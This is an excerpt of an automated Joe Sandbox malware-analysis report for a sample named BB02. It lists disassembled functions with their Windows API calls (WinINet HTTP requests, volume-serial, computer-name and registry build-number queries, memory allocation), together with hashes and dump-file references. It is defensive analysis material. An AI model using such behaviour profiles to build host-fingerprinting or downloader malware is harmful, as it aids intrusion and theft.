Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
String ID: ERROR$GET
API String ID: 3687753495-3591763792
Opcode ID: d4dda7033de1c3ef4f9815039b5a93dc3c9111a47bd79444559f63d6606b1acc
Instruction ID: f53a93b1956779abd9a8e71fe9530673e78fc1538c85e26cedc949aa3c7bae39
Opcode Fuzzy Hash: d4dda7033de1c3ef4f9815039b5a93dc3c9111a47bd79444559f63d6606b1acc
Instruction Fuzzy Hash: C1818071B00215ABEB20DFA4DC49BAF77B9AF44700F114169F905F72D0DBB8AD058BA8

Function 004226E0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,00A3AC00), ref: 0042271B
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,0042A470,00000000,00000000,00000000,00000000,?,00A3AC00), ref: 0042274C
GetProcessHeap.KERNEL32(00000000,00000104,?,00A3AC00), ref: 004227AF
HeapAlloc.KERNEL32(00000000,?,00A3AC00), ref: 004227B6
wsprintfA.USER32 ref: 004227DB

Strings

C, xrefs: 00422725
:\, xrefs: 00422735

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowswsprintf
String ID: :\$C
API String ID: 1325379522-3309953409
Opcode ID: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
Instruction ID: 1140a15a3936c49260c842706b5d3ee9313ab901dfb0a5368262f5a6e36a0845
Opcode Fuzzy Hash: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
Instruction Fuzzy Hash: D63181B1908219AFCB14CFB89A859EFBFB8FF58740F40016EE505E7250E2748A008BB5

Function 00405570 Relevance: 12.1, APIs: 8, Instructions: 112
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00405589
RtlAllocateHeap.NTDLL(00000000), ref: 00405590
InternetOpenA.WININET(0042D01C,00000000,00000000,00000000,00000000), ref: 004055A6
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 004055C1
InternetReadFile.WININET(?,?,00000400,00000001), ref: 004055EC
KiUserExceptionDispatcher.NTDLL(00000000,?,00000001), ref: 00405611
InternetCloseHandle.WININET(?), ref: 0040562B
InternetCloseHandle.WININET(00000000), ref: 00405632

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateDispatcherExceptionFileProcessReadUser
String ID:
API String ID: 1337183907-0
Opcode ID: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
Instruction ID: 854f5e81363ebd755ef7060f84f674ff8e42ebe29511b49783b395d7a9db8b06
Opcode Fuzzy Hash: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
Instruction Fuzzy Hash: EA416C70A00605AFDB24CF55DC48FABB7B5FF48304F5484AAE909AB390D7B69941CF98

Function 00421BD0 Relevance: 12.1, APIs: 8, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: a84b951d2b664242528f7cdbc79ceee9a28f995f159ad1c2a93245ee24929f84
Instruction ID: cac6e6cf4f72435ab544ab5d58b10c7d6a3df40e2c9cfd7f484d5f34573f69b4
Opcode Fuzzy Hash: a84b951d2b664242528f7cdbc79ceee9a28f995f159ad1c2a93245ee24929f84
Instruction Fuzzy Hash: 08315335B006169BCB20BF76DD8579F76A66F00744B44413BB901E72B1DF78ED058B98

Function 024E003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 024E024D

Strings

cess, xrefs: 024E018D
kernel32.dll, xrefs: 024E008F, 024E0095

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 0783c2768731fe3e8d9e8d57ada001befee56267019b85a16529305c8023ab95
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 76527A74A00229DFDB64CF58C984BADBBB1BF09305F1480DAE55EAB351DB70AA85CF14

Function 00404AE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000800,00A3AB80), ref: 00404B17
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404B21
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404B2B
lstrlenA.KERNEL32(?,00000000,?), ref: 00404B3F
InternetCrackUrlA.WININET(?,00000000), ref: 00404B47

Strings

<, xrefs: 00404B07

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: e251d69772999e3176d58f9cfffe3dca5ad148ce37591d7ebde40635c1bffff8
Instruction ID: 014b429b1741e436801b15e8bd7966bb0b54650bd2b29401a92df51bb3a02755
Opcode Fuzzy Hash: e251d69772999e3176d58f9cfffe3dca5ad148ce37591d7ebde40635c1bffff8
Instruction Fuzzy Hash: AE01ED71D00218AFDB14DFA9EC45B9EBBB9EB48364F00412AF954E7390DB7459058FD4

Function 004228B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004228C5
HeapAlloc.KERNEL32(00000000), ref: 004228CC
RegOpenKeyExA.KERNEL32(80000002,00A19250,00000000,00020119,00422849), ref: 004228EB
RegQueryValueExA.KERNEL32(00422849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422905
RegCloseKey.ADVAPI32(00422849), ref: 0042290F

Strings

CurrentBuildNumber, xrefs: 004228FF

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
Instruction ID: 511d72b61889e888fce99ae4c6434b8b9b60ca6e34e130828c21c0af2f9d307b
Opcode Fuzzy Hash: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
Instruction Fuzzy Hash: A401B1B5600318BFD314CBA0AC59EEB7BBDEB48741F100059FE45D7251EAB059488BE0

Function 00422820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422835
HeapAlloc.KERNEL32(00000000), ref: 0042283C

Part of subcall function 004228B0: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004228C5
Part of subcall function 004228B0: HeapAlloc.KERNEL32(00000000), ref: 004228CC
Part of subcall function 004228B0: RegOpenKeyExA.KERNEL32(80000002,00A19250,00000000,00020119,00422849), ref: 004228EB
Part of subcall function 004228B0: RegQueryValueExA.KERNEL32(00422849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422905
Part of subcall function 004228B0: RegCloseKey.ADVAPI32(00422849), ref: 0042290F

RegOpenKeyExA.KERNEL32(80000002,00A19250,00000000,00020119,?), ref: 00422871
RegQueryValueExA.KERNEL32(?,00A3E208,00000000,00000000,00000000,000000FF), ref: 0042288C
RegCloseKey.ADVAPI32(?), ref: 00422896

Strings

Windows 11, xrefs: 00422850

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
Instruction ID: 245893ec578ba7a3a6616ac8632bceecdb141f16bd8db204d0021f9794345961
Opcode Fuzzy Hash: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
Instruction Fuzzy Hash: 4B01AD71A00319BFDB14ABA4AD89EEA777EEB44315F004159FE09D3290EAB499448BE4

Function 0041EFE0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0041F013
StrCmpCA.SHLWAPI(?,ERROR,?,?,?,?,?,?,?,?,?,0041F54D), ref: 0041F02E
lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F08F

Strings

ERROR, xrefs: 0041F028, 0041F089

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: ERROR
API String ID: 3722407311-2861137601
Opcode ID: 448fdeabb24ebde3b25ee97d4b36c5f85406e70c23c7800a3f0480bd5252fb45
Instruction ID: 69ff5e85aab99745ebf021dc766ac19dec4547d6b77a9f3117695369316efa97
Opcode Fuzzy Hash: 448fdeabb24ebde3b25ee97d4b36c5f85406e70c23c7800a3f0480bd5252fb45
Instruction Fuzzy Hash: 2E2103717106065FCB24BF7ACD4979B37A4AF04308F40453AB849EB2E2DA79D8568798

Function 00422A70 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00422A9F
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00422AA6
GetComputerNameA.KERNEL32(00000000,00000104), ref: 00422ABA

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BB02.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: c4fbf6e2afe4e66effbfd3c9fa4561c4a9d4262e63b5d7c814415282457ea637
Instruction ID: efc61c24513596c7619485b0df79f857d3f5556d4fab8db62f2f2c2678d554aa
Opcode Fuzzy Hash: c4fbf6e2afe4e66effbfd3c9fa4561c4a9d4262e63b5d7c814415282457ea637
Instruction Fuzzy Hash: 4C01A272B44618ABD714DF99ED45B9AB7A8F748B21F00026BE915D3780D7B859008AE1

Function 00A1D43E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A1D466
Module32First.KERNEL32(00000000,00000224), ref: 00A1D486

Memory Dump Source

Source File: 00000001.00000002.2071390992.0000000000A1C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A1C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a1c000_BB02.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 2db28f7ba89565f7306546e660ecda9eff0bcd1cbff45637ba387dd3964ef338
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 5BF096351007117BD7303BF9D88DBEE76E8AF49724F104628E697914C0DB74FC858A61

Function 024E0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,024E0223,?,?), ref: 024E0E19
SetErrorMode.KERNEL32(00000000,?,?,024E0223,?,?), ref: 024E0E1E

Memory Dump Source

Source File: 00000001.00000002.2071531089.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_BB02.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 976d7545bf58b2575a6f5fc2ad6292d4e66bc1bcbf73e3e118de18fb1b373a76
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: B0D0123114512877DB003A94DC09BCE7B1CDF05B67F008021FB0DE9180C7B0954046E5

Function 0041EF30 Relevance: 1.3, APIs: 1, Instructions: 50stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 0041EF62

Memory Dump Source

Source File: 00000001.00000002.2070739085.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2070739085.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.2070739085.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
